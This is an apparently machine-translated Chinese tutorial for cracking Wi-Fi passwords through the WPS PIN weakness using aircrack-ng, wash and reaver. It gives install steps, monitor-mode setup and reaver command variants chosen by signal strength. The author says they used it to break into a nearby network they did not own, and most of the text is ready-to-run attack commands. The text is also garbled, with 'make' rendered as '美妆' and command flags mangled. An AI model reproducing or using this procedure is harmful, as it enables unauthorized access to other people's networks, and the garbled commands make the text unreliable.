和这个破解教程一样,网上的破解教程多是通过路由器进行WPS漏洞破解,但这样的路由器很少。 一般wifi是基于WPA/WPA2加密的,所以要解密一般wifi,必须解密此协议。 最近这个协议也被解密了,但是很辛苦。
刚入门破解,不太熟悉,在网上找了各种破解资料,终于成功破解了离工作室很近的wifi,很高兴~
本文试图通过wifi多次抓取PIN码来破解某些路由器的wi-fiprotected setup (wps )漏洞2-3天。 通常一定能撕开正确的PIN码。
一个路由器与唯一的MAC和PIN相对应,但一旦获得MAC和PIN,就可以通过reaver工具立即获得密码等信息。
1 .安装依赖软件包:
sudo apt-get install-y libpcap-dev
lib sqlite3-dev sqlite3 libpcap 0.8-dev libssl-dev build-essentialiwtsharksubversion
安装aircrack-ng :
SVN co http://SVN.aircrack-ng.org/trunk/aircrack-ng
cd aircrack-ng/
aircrack-ng源代码安装参考http://www.tui cool.com/articles/mfujii )。
sudo make install
安装reaver:
在https://pan.baidu.com/s/1kUdvM1D上下载reaver
tar zxvf reaver-1.4.tar.gz
cd reaver-1.4/src
./configure
美妆
sudo make install
4 .安装成功后,可以使用airmon-ng、airodump-ng、reaver等命令。 (如果没有ethtool,则安装apt-get install ethtool ) )。
5 .解读开始: (见http://www.she.VC/article/18-108334-0.html 3358 www.kali.org.cn/thread-20995-1-1.html
)1) sudo airmon-ng check kill (关闭进程,某些进程可能会影响后续操作) )。
found4processesthatcouldcausetrouble.if airodump-ng,aireplay-ngorairtun-ngstopsworkingafterashortperiodoftime, youmaywanttorun ' air mon-ngcheckkill ' PID name 431 avahi-daemon 446 dhcpcd 470 avahi-daemon 512 wpa _ supplicant (2) sudoairmirmating
)3) sudo airmon-ng start wlan1
)4) sudo airmon-ng start wlan1mon ) )打开网卡,将网卡转换为混合模式) ) ) ) )。
phyinterfacedriverchipsetphy0WLAN0brcmfmac _ sdio Broadcom 43430 missingnexutil,cannotswitchtomonitormode.phy1WLAN1monmt 7601 corp.(MAC 80211 monitormodealreadyenabledfor [ phy1] WLAN1monon [ phy1] 10 ) )5) sudo airodump-ng wlan1mon )确认并解密ap信号强度
(6) wash -i wlan1mon -C )查看支持wps的ap ) )一般来说,MB可以解密54e .54e不可解密) )。
6.(正式解密,在途径下)使用reaver :
状况调整参数: MAC或BSSID的值,-c后的数字是CH的值。
目标信号非常好:
reaver-I WLAN1mon-bmac-a-s-vv-d0-C1
目标信号一般为:
reaver-I WLAN1mon-bmac-a-s-vv-D2-t5-C1
目标信号通常为:
reaver-I WLAN1mon-bmac-a-s-vv-D5-C1
每7.60s再次解密,等待3天,就会出现密码
8 .最终获取PIN码(WPS PIN )和密码(WPA PSK ),如果密码发生变更,在reaver中添加-p命令即可
(reaver -i wlan1mon -b MAC -p PIN码-vv )、密码还可以秒为单位输出; 但是,如果PIN码被更改,则会重新解密。
9 .破解完成后,将网卡恢复正常状态(airmon-ng stop wlan1mon )
备注: reaver时可以随时停止。 自己保存进展状况
固件http://net security.51cto.com/art/201105/264844 _ all.htm升级